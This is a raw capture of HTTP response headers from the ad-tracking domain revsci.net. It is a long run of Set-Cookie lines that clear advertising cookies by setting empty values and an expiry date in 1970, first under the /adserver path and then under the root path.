Set-Cookie: rsiPus_VVZs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZxL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p52T=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LU5v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uqCf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9hMX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hufe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_XwOO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DQmF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E_kE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_t2Ci=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ruoh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eGsw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cly0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_38vw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TJin=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_iScD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3v-F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_JQpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_l5FR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Wu51=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bmoM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HmBn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8At2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-43F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZQ2V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X7VX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_O93y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_semT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qPtn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lHfg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tnTy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cCPz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uI4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2KsA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_reJm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tv4w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_A8W5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oGKA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cy6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZrA0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_L8i2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Sa36=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FrsI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zESt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ym1n=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pUuq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uwnv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__2mg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_EZsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZZ0H=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BNSC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tax2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xyGv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yfbI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sG0W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_4VQP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ExVS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cgR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wtrl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_o9vY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xmhv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qM8j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_waet=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RBpd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mILT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__nAQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VsZJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xqRq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GHGt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DSfE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tlyw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8Xg2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_J61O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hhbJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pHL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_XsfT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eQFb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qJz5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E85s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Ucm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_v_f5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bDDn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rNcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5TRc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_l2Kn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sZLs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qEBt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GPFg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HG8X=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AMrT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_L9DA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_1djr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R2Sk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tqia=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_W0Nw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wjT0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OVF5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xj6q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Tn_F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Xy4W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7q1i=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3mus=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9AUr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nDzG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_41iQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_70NL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lLND=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_WJEP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ew4y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Av4C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_KbQB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VU1j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tsTn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RqxL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_CYmT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3BOa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dhOx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gXRf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_w1GX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_91sR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Xxa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xUzf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RS6A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rX_Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ynys=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xND8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_U2-d=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_S-vO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HG7G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_id7F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2D0P=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_M1Z_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2RcV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fldA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_i0tL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_4m8k=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ppkq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_G93Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_JCjG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yHyN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_C5Uh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8olB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kFhz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_JeGp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Re8S=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pDeg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wxyS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VyjV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_JsaM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_1p6o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VIa5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Zc6p=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ptuf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AlmC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__Yzb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_k7NG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dpiY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OLBq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_D3J-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Tpuf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_MnS9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Bpmx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gx4y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OGcW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_4g95=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gjH6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GCsG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_l41s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nSTc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Zd-e=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Dpzn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AnWT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Jcjr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wDL0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GNkZ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Mzt2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_A76z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pLOm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_4cFc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kaha=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ar9b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Iei_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_h03W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yjA-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jxhu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vWHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_IhUn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VkyB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kT-f=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_6E4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5ibF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_QSMB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7GZu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ykjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_B74h=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VVZs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZxL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p52T=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LU5v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uqCf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9hMX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hufe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_XwOO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DQmF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E_kE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_t2Ci=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ruoh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_eGsw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cly0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_38vw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TJin=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_iScD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3v-F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JQpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l5FR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Wu51=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
